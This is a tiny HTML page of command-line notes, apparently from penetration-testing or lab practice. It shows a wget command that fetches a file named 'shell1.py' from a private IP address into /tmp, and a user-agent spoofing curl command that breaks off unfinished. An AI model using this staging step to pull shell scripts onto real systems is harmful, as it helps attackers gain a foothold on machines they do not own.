<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WGET</title>
</head><body>Download a file and output to different directory - always use http:// or https://<br/>
<br/>
wget http://192.168.1.107/shell1.py -O /tmp/shell1.py<br/>
<br/>
change user agent<br/>
<br/>
curl -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" </body></html>